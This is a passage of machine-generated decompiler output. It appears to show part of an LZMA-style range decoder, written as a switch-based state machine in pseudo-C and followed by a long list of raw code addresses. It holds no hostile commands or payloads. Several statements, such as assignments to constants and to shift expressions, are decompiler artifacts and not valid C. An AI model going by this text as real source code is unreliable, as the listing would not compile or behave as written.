											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00406c2e
0x00406c2e
0x00406c32
0x00406c5b
0x00406c65
0x00406c34
0x00406c3d
0x00406c4a
0x00406c4d
0x00406f91
0x00406f91
0x00406f94
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fe0
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00407195
0x004071ab
0x004071b3
0x004071ba
0x004071bc
0x004071c3
0x004071c7
0x004071c7
0x00406ff2
0x00406ff9
0x00407001
0x00407004
0x00407007
0x00407007
0x0040700d
0x0040700d
0x004067a9
0x004067a9
0x004067a9
0x004067b2
0x00000000
0x00000000
0x004067b8
0x00000000
0x004067c3
0x00000000
0x00000000
0x004067cc
0x004067cf
0x004067d2
0x004067d6
0x00000000
0x00000000
0x004067dc
0x004067df
0x004067e1
0x004067e2
0x004067e5
0x004067e7
0x004067e8
0x004067ea
0x004067ed
0x004067f2
0x004067f7
0x00406800
0x00406813
0x00406816
0x00406822
0x0040684a
0x0040684c
0x0040685a
0x0040685a
0x0040685e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040684e
0x0040684e
0x00406851
0x00406852
0x00406852
0x00000000
0x0040684e
0x00406828
0x0040682d
0x0040682d
0x00406836
0x0040683e
0x00406841
0x00000000
0x00406847
0x00406847
0x00000000
0x00406847
0x00000000
0x00406864
0x00406864
0x00406868
0x00407114
0x00000000
0x00407114
0x00406871
0x00406881
0x00406884
0x00406887
0x00406887
0x00406887
0x0040688a
0x0040688e
0x00000000
0x00000000
0x00406890
0x00406896
0x004068c0
0x004068c6
0x004068cd
0x00000000
0x004068cd
0x0040689c
0x0040689f
0x004068a4
0x004068a4
0x004068af
0x004068b7
0x004068ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068ff
0x00406905
0x00406908
0x00406915
0x0040691d
0x00406f91
0x00000000
0x00000000
0x004068d4
0x004068d4
0x004068d8
0x00407123
0x00000000
0x00407123
0x004068e4
0x004068ef
0x004068ef
0x004068ef
0x004068f2
0x004068f5
